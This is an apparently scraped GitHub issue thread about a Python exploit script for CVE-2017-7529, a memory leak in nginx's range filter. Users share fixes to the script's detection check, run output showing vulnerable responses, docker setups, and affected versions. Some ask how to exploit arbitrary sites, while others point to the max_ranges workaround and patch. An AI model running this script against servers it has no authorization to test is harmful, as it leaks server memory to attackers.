Comments (36)
vadimik
commented on July 30, 2024
10
Hi, could you tell me ho to use exploit. Thenks!
from labs.
RackunSec
commented on July 30, 2024
10
Hello, I got here while searching for an exploit from a HTB system.
To everyone getting the "Unknown Vulnerable" error - update the code like so, starting at line 32:
httpResponse = send_http_request(url, headers={ 'Range': content_length })
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
log.info("[+] Vulnerable to CVE-2017-7529")
else:
print("[!] Target not vulnerable: HTTP response code: "+str(httpResponse.status_code))
This way, you can actually see the HTTP response code from the target server. If it's not "206" as the logic shows in the exploit test code, if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers then the server could already be patched for this vulnerability.
This is probably the case if Ngnix is installed from distribution's package repositories.
I hope that this helps.
~Douglas
from labs.
snorez
commented on July 30, 2024
6
This python script does work. The url need to be something like http://xxx/yyy/zzz.png, also, you should modify nginx.conf to make the url could be accessed.
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
NOT
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
We need a image file to do this.
The ngx_http_range_header_filter() check r->allow_range, which is set when the file acquired is an image.
I compiled nginx 1.14.0 without this patch.
test@ubuntu:~/Desktop$ python cve-2017-7529.py http://127.0.0.1/images/demo.png
INFO:__main__:target: http://127.0.0.1/images/demo.png
INFO:__main__:status: 200: Server: nginx/1.14.0 (Ubuntu)
INFO:__main__:status: 206: Server: nginx/1.14.0 (Ubuntu)
{'Server': 'nginx/1.14.0 (Ubuntu)', 'Last-Modified': 'Tue, 14 May 2019 08:34:34 GMT', 'Connection': 'keep-alive', 'ETag': '"5cda7d9a-eba5"', 'Date': 'Tue, 14 May 2019 09:01:44 GMT', 'Content-Type': 'multipart/byteranges; boundary=00000000000000000002'}
--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-60324/60325
INFO:__main__:[+] Vulnerable to CVE-2017-7529
from labs.
siochs
commented on July 30, 2024
5
Still curious why the Exploit does not work using a vulnerable nginx-proxy runnning in a docker container.
from labs.
thehappydinoa
commented on July 30, 2024
5
I fixed up this exploit and made it into a nice little gist: https://gist.github.com/thehappydinoa/bc3278aea845b4f578362e9363c51115
from labs.
noraj
commented on July 30, 2024
4
You may want to submit your exploit @ https://www.exploit-db.com/submit/
from labs.
woei66
commented on July 30, 2024
2
is there solution for this? is it a high risk issue?
from labs.
LJ-Silver
commented on July 30, 2024
1
in line
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
need to be replaced by
httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
After that change, I'm still getting:
INFO:main:status: 200: Server: nginx/1.10.3
INFO:main:[?] Unknown Vulnerable
any idea?
from labs.
marcelo321
commented on July 30, 2024
1
it appears that nginx/1.12.1 isn't vunerable, but it is on the range 0.5.6 - 1.13.2. can someone verify this please??
from labs.
Jaganmohan029
commented on July 30, 2024
Copy the code and paste it in notepad of windows or whatever the OS you're using and run it using the following command
python "text file name".py "URL you want to exploit"
ex: python3 test.py http://www."URL".com
from labs.
siochs
commented on July 30, 2024
Hmm, just tried the following:
docker run -d -p 80:80 -v /var/run/docker.sock:/tmp/docker.sock:ro jwilder/nginx-proxy:0.6.0
docker run -d --expose 80 -e VIRTUAL_HOST=foo.bar.com tutum/hello-world
On the host, i added 127.0.0.1 foo.bar.com to /etc/hosts to get foo.bar.com resolved.
curl -L foo.bar.com
outputs "Hello World", so the nginx-proxy is working.
python CVE-2017-7529.py http://foo.bar.com/etc/fstab
outputs
INFO:__main__:target: http://foo.bar.com/etc/fstab
INFO:__main__:status: 200: Server: nginx/1.11.10
INFO:__main__:status: 200: Server: nginx/1.11.10
INFO:__main__:[?] Unknown Vulnerable
According to Dockerfile and to the proxy replies the nginx-version is 1.11.10, so the bug should apply, right?
from labs.
nixawk
commented on July 30, 2024
Thanks @siochs . I will try to review it.
from labs.
woei66
commented on July 30, 2024
I found a article about this issue and looks like there is a patch for this issue.
Let's wait for the new release with this patch code.
Thank you.
https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7529.html
the following configuration can
be used as a temporary workaround:
max_ranges 1;
http://nginx.org/download/patch.2017.ranges.txt
from labs.
r3k2
commented on July 30, 2024
https://access.redhat.com/security/cve/cve-2017-7529 FYI.
from labs.
murat-kaya
commented on July 30, 2024
@siochs Change this;
"Content-Range" in httpResponse.text
to this
"Content-Range" in httpResponse.headers
from labs.
qre0ct
commented on July 30, 2024
This still does not seem to work and I get the same error as @siochs . Any further suggestions ?
from labs.
jatoch
commented on July 30, 2024
It didnt work for me aswell
from labs.
sangeeta667143
commented on July 30, 2024
didnt work for me as well..
same output for me also
NFO:main:target: http://www.examlpe.com
INFO:main:status: 200: Server: nginx/1.11.10
INFO:main:status: 200: Server: nginx/1.11.10
INFO:main:[?] Unknown Vulnerable
from labs.
tiropas
commented on July 30, 2024
what version of python are you all using? sometimes if the version isn't correct python gives out errors.
from labs.
commented on July 30, 2024
I get the same error as @siochs.any idea how to resolve it
from labs.
jatoch
commented on July 30, 2024
INFO:main:[?] Unknown Vulnerable
from labs.
avi2606
commented on July 30, 2024
same error here too
INFO:main:status: 200: Server: nginx
INFO:main:status: 200: Server: nginx
INFO:main:[?] Unknown Vulnerable
from labs.
Abdelkad3r
commented on July 30, 2024
same error here too:
INFO:main:target: https://url.com
INFO:main:status: 200: Server: nginx/1.12.1
INFO:main:status: 200: Server: nginx/1.12.1
INFO:main:[?] Unknown Vulnerable
from labs.
iamdevnull
commented on July 30, 2024
same error here too:
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): site.com INFO:__main__:status: 416: Server: nginx/1.10.3 (Ubuntu) INFO:__main__:[?] Unknown Vulnerable
any idea ?
from labs.
jatoch
commented on July 30, 2024
Not vulnerable: 1.13.3+, 1.12.1+
Vulnerable: 0.5.6-1.13.2
from labs.
theaayushanand
commented on July 30, 2024
Change "Content-Range" in httpResponse.text to "Content-Range" in httpResponse.headers
from labs.
elcolie
commented on July 30, 2024
I got httpResponse.status_code == 200 Is that OK?
from labs.
sakurakishiro
commented on July 30, 2024
the same error .
INFO:__main__:target: (http://www.****.com) INFO:__main__:status: 200: Server: nginx/1.8.0 INFO:__main__:status: 200: Server: nginx/1.8.0 INFO:__main__:[?] Unknown Vulnerable
from labs.
hlw0159
commented on July 30, 2024
hey i find nginx/1.13.9 cve???
from labs.
technick333
commented on July 30, 2024
in line
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
need to be replaced by
httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
from labs.
hlw0159
commented on July 30, 2024
I am looking for nginx1.14.1 cve.
Is there ??
from labs.
skesineni
commented on July 30, 2024
Hello, We've updated our Nginx to new version 1.15.9 but still getting Vulnerable to CVE-2017-7529 message. Why is it still showing that message instead of Unknown Vulnerable after we updated to latest version. Can anyone give any inputs? Thanks!
INFO:main:status: 200: Server:
INFO:main:status: 206: Server:
INFO:main:[+] Vulnerable to CVE-2017-7529
from labs.
hackersden09
commented on July 30, 2024
anyone can tell me what is the mean of this responce
i wants to exploit this vul
INFO:main:status: 200: Server: nginx/1.10.3
INFO:main:status: 200: Server: nginx/1.10.3
INFO:main:[?] Unknown Vulnerable
from labs.
rjw245
commented on July 30, 2024
I fixed up this exploit and made it into a nice little gist: https://gist.github.com/thehappydinoa/bc3278aea845b4f578362e9363c51115
The gist ignores snorez advice to look for Content-Range in the response text as opposed to the header.
from labs.
rjw245
commented on July 30, 2024
This python script does work. The url need to be something like http://xxx/yyy/zzz.png, also, you should modify nginx.conf to make the url could be accessed.
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:NOT
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:We need a image file to do this.
Thengx_http_range_header_filter()checkr->allow_range, which is set when the file acquired is an image.I compiled nginx 1.14.0 without this patch.
test@ubuntu:~/Desktop$ python cve-2017-7529.py http://127.0.0.1/images/demo.png INFO:__main__:target: http://127.0.0.1/images/demo.png INFO:__main__:status: 200: Server: nginx/1.14.0 (Ubuntu) INFO:__main__:status: 206: Server: nginx/1.14.0 (Ubuntu) {'Server': 'nginx/1.14.0 (Ubuntu)', 'Last-Modified': 'Tue, 14 May 2019 08:34:34 GMT', 'Connection': 'keep-alive', 'ETag': '"5cda7d9a-eba5"', 'Date': 'Tue, 14 May 2019 09:01:44 GMT', 'Content-Type': 'multipart/byteranges; boundary=00000000000000000002'} --00000000000000000002 Content-Type: image/png Content-Range: bytes -623-60324/60325 INFO:__main__:[+] Vulnerable to CVE-2017-7529
@snorez Will HTTPS not work for reproducing this exploit?
from labs.
Otojon
commented on July 30, 2024
Hmm? Interesting .... exploit is not working with vulnerable server
from labs.
Related Issues (20)
- New ajust on xpl HOT 4
- [Add] CVE-2017-8464 HOT 1
- [Question] Fuzzing
- Bug at line number 232 when bindata is finally written into file (Windows Environment) HOT 1
- [Analysis] CVE-2015-2545
- [Exploit] CVE-2017-8570
- [Exploit] CVE-2017-5638 : Apache Struts2 S2_045
- [Exploit] CVE-2017-17411 - Linksys WVBR0 25 Command Injection
- [Links] MS17-010
- [Exploit] CVE-2018-7600 - drupal: Unsanitized requests allow remote attackers to execute arbitrary code HOT 20
- How can I recurrent this vulnerable? HOT 3
- [Exploit] CVE-2018-10562 GPON Home Routers RCE HOT 1
- guide
- p
- Potential false negative with the CVE-2017-5689.py script HOT 3
- CVE-2017-0199 HOT 1
- [CVE-2017-7497] Samba - Remote code execution from a writable share HOT 4
- Apache Struts2 S2-048 HOT 5
- [Analysis] MS17_010
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from labs.